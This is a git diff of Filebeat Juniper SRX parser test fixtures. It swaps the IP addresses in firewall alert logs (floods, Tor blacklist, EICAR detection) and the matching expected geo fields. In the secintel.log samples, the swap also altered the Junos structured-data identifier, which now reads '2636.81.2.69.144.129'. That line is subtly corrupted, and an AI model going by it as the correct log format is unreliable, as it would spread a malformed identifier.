+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.112",
         "source.port": 6000,
         "tags": [
             "forwarded",
@@ -96,7 +90,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP",
         "log.level": "error",
-        "log.offset": 294,
+        "log.offset": 298,
         "observer.ingress.interface.name": "fe-0/0/2.0",
         "observer.ingress.zone": "untrust",
         "observer.name": "rtr199",
@@ -119,15 +113,8 @@
     },
     {
         "@timestamp": "2018-07-19T21:19:02.309-02:00",
-        "client.ip": "1.1.1.2",
+        "client.ip": "81.2.69.144",
         "client.port": 40001,
-        "destination.as.number": 3215,
-        "destination.as.organization.name": "Orange",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
         "destination.ip": "2.2.2.2",
         "destination.port": 50010,
         "event.action": "flood_detected",
@@ -138,7 +125,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"SYN flood!\" source-address=\"1.1.1.2\" source-port=\"40001\" destination-address=\"2.2.2.2\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+        "event.original": "attack-name=\"SYN flood!\" source-address=\"81.2.69.144\" source-port=\"40001\" destination-address=\"2.2.2.2\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -154,7 +141,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP",
         "log.level": "error",
-        "log.offset": 644,
+        "log.offset": 652,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
         "observer.name": "rtr199",
@@ -162,20 +149,21 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "1.1.1.2",
-            "2.2.2.2"
+            "2.2.2.2",
+            "81.2.69.144"
         ],
         "server.ip": "2.2.2.2",
         "server.port": 50010,
         "service.type": "juniper",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.2",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.144",
         "source.port": 40001,
         "tags": [
             "forwarded",
@@ -184,16 +172,8 @@
     },
     {
         "@timestamp": "2018-07-19T21:22:02.309-02:00",
-        "client.ip": "111.1.1.3",
+        "client.ip": "81.2.69.143",
         "client.port": 40001,
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
         "destination.ip": "3.4.2.2",
         "destination.port": 53,
         "event.action": "flood_detected",
@@ -204,7 +184,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"UDP flood!\" source-address=\"111.1.1.3\" source-port=\"40001\" destination-address=\"3.4.2.2\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+        "event.original": "attack-name=\"UDP flood!\" source-address=\"81.2.69.143\" source-port=\"40001\" destination-address=\"3.4.2.2\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -220,7 +200,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_UDP",
         "log.level": "error",
-        "log.offset": 930,
+        "log.offset": 946,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
         "observer.name": "rtr199",
@@ -228,23 +208,21 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "111.1.1.3",
-            "3.4.2.2"
+            "3.4.2.2",
+            "81.2.69.143"
         ],
         "server.ip": "3.4.2.2",
         "server.port": 53,
         "service.type": "juniper",
-        "source.as.number": 56041,
-        "source.as.organization.name": "China Mobile communications corporation",
-        "source.geo.city_name": "Wenzhou",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 27.9983,
-        "source.geo.location.lon": 120.6666,
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "111.1.1.3",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 40001,
         "tags": [
             "forwarded",
@@ -253,15 +231,7 @@
     },
     {
         "@timestamp": "2018-07-19T21:25:02.309-02:00",
-        "client.ip": "111.1.1.3",
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
+        "client.ip": "81.2.69.143",
         "destination.ip": "3.4.2.2",
         "event.action": "fragment_detected",
         "event.category": [
@@ -271,7 +241,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"ICMP fragment!\" source-address=\"111.1.1.3\" destination-address=\"3.4.2.2\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+        "event.original": "attack-name=\"ICMP fragment!\" source-address=\"81.2.69.143\" destination-address=\"3.4.2.2\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -287,7 +257,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_ICMP",
         "log.level": "error",
-        "log.offset": 1215,
+        "log.offset": 1237,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
         "observer.name": "rtr199",
@@ -295,22 +265,20 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "111.1.1.3",
-            "3.4.2.2"
+            "3.4.2.2",
+            "81.2.69.143"
         ],
         "server.ip": "3.4.2.2",
         "service.type": "juniper",
-        "source.as.number": 56041,
-        "source.as.organization.name": "China Mobile communications corporation",
-        "source.geo.city_name": "Wenzhou",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 27.9983,
-        "source.geo.location.lon": 120.6666,
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "111.1.1.3",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded",
             "juniper.srx"
@@ -318,15 +286,7 @@
     },
     {
         "@timestamp": "2018-07-19T21:26:02.309-02:00",
-        "client.ip": "111.1.1.3",
-        "destination.geo.city_name": "Seattle",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 47.6348,
-        "destination.geo.location.lon": -122.3451,
-        "destination.geo.region_iso_code": "US-WA",
-        "destination.geo.region_name": "Washington",
+        "client.ip": "81.2.69.143",
         "destination.ip": "3.4.2.2",
         "event.category": [
             "intrusion_detection",
@@ -335,7 +295,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"Record Route IP option!\" source-address=\"111.1.1.3\" destination-address=\"3.4.2.2\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+        "event.original": "attack-name=\"Record Route IP option!\" source-address=\"81.2.69.143\" destination-address=\"3.4.2.2\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -351,7 +311,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_IP",
         "log.level": "error",
-        "log.offset": 1463,
+        "log.offset": 1491,
         "network.iana_number": "1",
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
@@ -360,22 +320,20 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "111.1.1.3",
-            "3.4.2.2"
+            "3.4.2.2",
+            "81.2.69.143"
         ],
         "server.ip": "3.4.2.2",
         "service.type": "juniper",
-        "source.as.number": 56041,
-        "source.as.organization.name": "China Mobile communications corporation",
-        "source.geo.city_name": "Wenzhou",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 27.9983,
-        "source.geo.location.lon": 120.6666,
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "111.1.1.3",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded",
             "juniper.srx"
@@ -409,7 +367,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_IP",
         "log.level": "error",
-        "log.offset": 1734,
+        "log.offset": 1768,
         "network.iana_number": "1",
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
@@ -431,12 +389,7 @@
     },
     {
         "@timestamp": "2018-07-19T21:28:02.309-02:00",
-        "client.ip": "12.12.12.1",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "client.ip": "81.2.69.145",
         "destination.ip": "11.11.11.1",
         "event.action": "tunneling_screen",
         "event.category": [
@@ -446,7 +399,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"Tunnel GRE 4in4!\" source-address=\"12.12.12.1\" destination-address=\"11.11.11.1\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
+        "event.original": "attack-name=\"Tunnel GRE 4in4!\" source-address=\"81.2.69.145\" destination-address=\"11.11.11.1\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -462,7 +415,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_IP",
         "log.level": "error",
-        "log.offset": 1998,
+        "log.offset": 2036,
         "network.iana_number": "1",
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
@@ -472,18 +425,19 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "11.11.11.1",
-            "12.12.12.1"
+            "81.2.69.145"
         ],
         "server.ip": "11.11.11.1",
         "service.type": "juniper",
-        "source.as.number": 32328,
-        "source.as.organization.name": "Alascom, Inc.",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "12.12.12.1",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.145",
         "tags": [
             "forwarded",
             "juniper.srx"
@@ -491,13 +445,6 @@
     },
     {
         "@timestamp": "2018-07-19T22:19:02.309-02:00",
-        "destination.as.number": 3215,
-        "destination.as.organization.name": "Orange",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "FR",
-        "destination.geo.country_name": "France",
-        "destination.geo.location.lat": 48.8582,
-        "destination.geo.location.lon": 2.3387,
         "destination.ip": "2.2.2.2",
         "event.action": "flood_detected",
         "event.category": [
@@ -523,7 +470,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP_DST_IP",
         "log.level": "error",
-        "log.offset": 2266,
+        "log.offset": 2309,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
         "observer.name": "rtr199",
@@ -542,7 +489,7 @@
     },
     {
         "@timestamp": "2018-07-19T22:19:02.309-02:00",
-        "client.ip": "111.1.1.3",
+        "client.ip": "81.2.69.143",
         "event.action": "flood_detected",
         "event.category": [
             "intrusion_detection",
@@ -551,7 +498,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "attack-name=\"SYN flood!\" source-address=\"111.1.1.3\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"",
+        "event.original": "attack-name=\"SYN flood!\" source-address=\"81.2.69.143\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"",
         "event.outcome": "success",
         "event.severity": 11,
         "event.timezone": "-02:00",
@@ -567,7 +514,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP_SRC_IP",
         "log.level": "error",
-        "log.offset": 2503,
+        "log.offset": 2550,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trustZone",
         "observer.name": "rtr199",
@@ -575,20 +522,18 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "111.1.1.3"
+            "81.2.69.143"
         ],
         "service.type": "juniper",
-        "source.as.number": 56041,
-        "source.as.organization.name": "China Mobile communications corporation",
-        "source.geo.city_name": "Wenzhou",
-        "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "CN",
-        "source.geo.country_name": "China",
-        "source.geo.location.lat": 27.9983,
-        "source.geo.location.lon": 120.6666,
-        "source.geo.region_iso_code": "CN-ZJ",
-        "source.geo.region_name": "Zhejiang",
-        "source.ip": "111.1.1.3",
+        "source.geo.city_name": "London",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded",
             "juniper.srx"
@@ -624,7 +569,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP",
         "log.level": "error",
-        "log.offset": 2737,
+        "log.offset": 2790,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trust",
         "observer.name": "rtr199",
@@ -675,7 +620,7 @@
         "juniper.srx.process": "RT_IDS",
         "juniper.srx.tag": "RT_SCREEN_TCP",
         "log.level": "error",
-        "log.offset": 3028,
+        "log.offset": 3085,
         "observer.ingress.interface.name": "ge-0/0/1.0",
         "observer.ingress.zone": "trust",
         "observer.name": "rtr199",
diff --git a/x-pack/filebeat/module/juniper/srx/test/secintel.log b/x-pack/filebeat/module/juniper/srx/test/secintel.log
index 12f8f137c7f3..e4d1b13fd759 100644
--- a/x-pack/filebeat/module/juniper/srx/test/secintel.log
+++ b/x-pack/filebeat/module/juniper/srx/test/secintel.log
@@ -1,2 +1,2 @@
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="5.196.121.161" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
-<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.1.1.1.2.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="1.1.1.1" source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.81.2.69.144.129 category="secintel" sub-category="Blacklist" action="BLOCK" action-detail="DROP" http-host="N/A" threat-severity="0" source-address="67.43.156.12" source-port="1" destination-address="10.10.0.10" destination-port="24039" protocol-id="1" application="N/A" nested-application="N/A" feed-name="Tor_Exit_Nodes" policy-name="cc_policy" profile-name="Blacklist" username="N/A" roles="N/A" session-id-32="572564" source-zone-name="Outside" destination-zone-name="DMZ"]
+<14>1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@2636.81.2.69.144.129 category="secintel" sub-category="CC" action="BLOCK" action-detail="CLOSE REDIRECT MSG" http-host="dummy_host" threat-severity="10" source-address="89.160.20.156" source-port="36612" destination-address="10.0.0.1" destination-port="80" protocol-id="6" application="HTTP" nested-application="N/A" feed-name="cc_url_data" policy-name="test" profile-name="test-profile" username="N/A" roles="N/A" session-id-32="502362" source-zone-name="Inside" destination-zone-name="Outside" occur-count="0"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
index d282ccd1be18..cd6626cb186f 100644
--- a/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/secintel.log-expected.json
@@ -1,7 +1,7 @@
 [
     {
         "@timestamp": "2016-10-17T13:18:11.618-02:00",
-        "client.ip": "5.196.121.161",
+        "client.ip": "67.43.156.12",
         "client.port": 1,
         "destination.ip": "10.10.0.10",
         "destination.port": 24039,
@@ -13,7 +13,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"5.196.121.161\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"",
+        "event.original": "category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.12\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -46,19 +46,18 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "10.10.0.10",
-            "5.196.121.161"
+            "67.43.156.12"
         ],
         "server.ip": "10.10.0.10",
         "server.port": 24039,
         "service.type": "juniper",
-        "source.as.number": 16276,
-        "source.as.organization.name": "OVH SAS",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "FR",
-        "source.geo.country_name": "France",
-        "source.geo.location.lat": 48.8582,
-        "source.geo.location.lon": 2.3387,
-        "source.ip": "5.196.121.161",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.port": 1,
         "tags": [
             "forwarded",
@@ -67,7 +66,7 @@
     },
     {
         "@timestamp": "2016-10-17T13:18:11.618-02:00",
-        "client.ip": "1.1.1.1",
+        "client.ip": "89.160.20.156",
         "client.port": 36612,
         "destination.ip": "10.0.0.1",
         "destination.port": 80,
@@ -79,7 +78,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "alert",
         "event.module": "juniper",
-        "event.original": "category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"1.1.1.1\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"",
+        "event.original": "category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"89.160.20.156\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -104,7 +103,7 @@
         "juniper.srx.tag": "SECINTEL_ACTION_LOG",
         "juniper.srx.threat_severity": "10",
         "log.level": "informational",
-        "log.offset": 561,
+        "log.offset": 564,
         "network.iana_number": "6",
         "observer.egress.zone": "Outside",
         "observer.ingress.zone": "Inside",
@@ -116,20 +115,23 @@
             "dummy_host"
         ],
         "related.ip": [
-            "1.1.1.1",
-            "10.0.0.1"
+            "10.0.0.1",
+            "89.160.20.156"
         ],
         "server.ip": "10.0.0.1",
         "server.port": 80,
         "service.type": "juniper",
-        "source.as.number": 13335,
-        "source.as.organization.name": "Cloudflare, Inc.",
-        "source.geo.continent_name": "Oceania",
-        "source.geo.country_iso_code": "AU",
-        "source.geo.country_name": "Australia",
-        "source.geo.location.lat": -33.494,
-        "source.geo.location.lon": 143.2104,
-        "source.ip": "1.1.1.1",
+        "source.as.number": 29518,
+        "source.as.organization.name": "Bredband2 AB",
+        "source.geo.city_name": "Link\u00f6ping",
+        "source.geo.continent_name": "Europe",
+        "source.geo.country_iso_code": "SE",
+        "source.geo.country_name": "Sweden",
+        "source.geo.location.lat": 58.4167,
+        "source.geo.location.lon": 15.6167,
+        "source.geo.region_iso_code": "SE-E",
+        "source.geo.region_name": "\u00d6sterg\u00f6tland County",
+        "source.ip": "89.160.20.156",
         "source.port": 36612,
         "tags": [
             "forwarded",
diff --git a/x-pack/filebeat/module/juniper/srx/test/utm.log b/x-pack/filebeat/module/juniper/srx/test/utm.log
index 61c320ae8859..7c336e1e2f2c 100644
--- a/x-pack/filebeat/module/juniper/srx/test/utm.log
+++ b/x-pack/filebeat/module/juniper/srx/test/utm.log
@@ -1,12 +1,12 @@
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.86 source-address="10.10.10.50" source-port="1402" destination-address="216.200.241.66" destination-port="80" category="N/A" reason="BY_OTHER" profile="wf-profile" url="www.checkpoint.com" obj="/css/homepage2012.css" username="user02" roles="N/A"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@2636.1.1.1.2.40 source-address="188.40.238.250" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<12>1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@2636.1.1.1.2.40 source-address="74.125.155.147" source-port="80" destination-address="10.1.1.103" destination-port="33578" filename="www.google.com/" error-code="14" error-message="scan engine is not ready"]
-<12>1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@2636.1.1.1.2.40 source-address="10.2.1.101" source-port="80" destination-address="10.1.1.103" destination-port="51727" filename="10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz"]
-<14>1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@2636.1.1.1.2.86 source-zone="trust" destination-zone="untrust" source-name="N/A" source-address="10.10.10.1" profile-name="antispam01" action="drop" reason="Match local blacklist" username="user01" roles="N/A"]
-<14>1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@2636.1.1.1.2.86 source-zone="untrust" destination-zone="trust" protocol="http" source-address="192.0.2.3" source-port="58071" destination-address="198.51.100.2" destination-port="80" profile-name="content02" action="drop" reason="blocked due to file extension block list" username="user01@testuser.com" roles="N/A" filename="test.cmd"]
-<12>1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@2636.1.1.1.2.86 source-address="192.168.1.100" source-port="58071" destination-address="103.235.46.39" destination-port="80" category="cat1" reason="BY_BLACK_LIST" profile="uf1" url="www.baidu.com" obj="/" username="user01" roles="N/A"]
-<12>1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@2636.1.1.1.2.40 source-address="188.40.238.250" source-port="80" destination-address="10.1.1.103" destination-port="47095" source-zone-name="untrust" filename="www.eicar.org/download/eicar.com" temporary-filename="www.eicar.org/download/eicar.com" name="EICAR-Test-File" url="EICAR-Test-File"]
-<14>1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="58974" destination-address="104.26.15.142" destination-port="443" session-id="16297" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Information_Technology" reason="BY_SITE_REPUTATION_MODERATELY_SAFE" profile="WCF1" url="datawrapper.dwcdn.net" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="0"]
-<12>1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@2636.1.1.1.2.129 source-zone="trust" destination-zone="untrust" source-address="10.1.1.100" source-port="59075" destination-address="85.114.159.93" destination-port="443" session-id="16490" application="UNKNOWN" nested-application="UNKNOWN" category="Enhanced_Advertisements" reason="BY_SITE_REPUTATION_SUSPICIOUS" profile="WCF1" url="dsp.adfarm1.adition.com" obj="/" username="N/A" roles="N/A" application-sub-category="N/A" urlcategory-risk="3"]
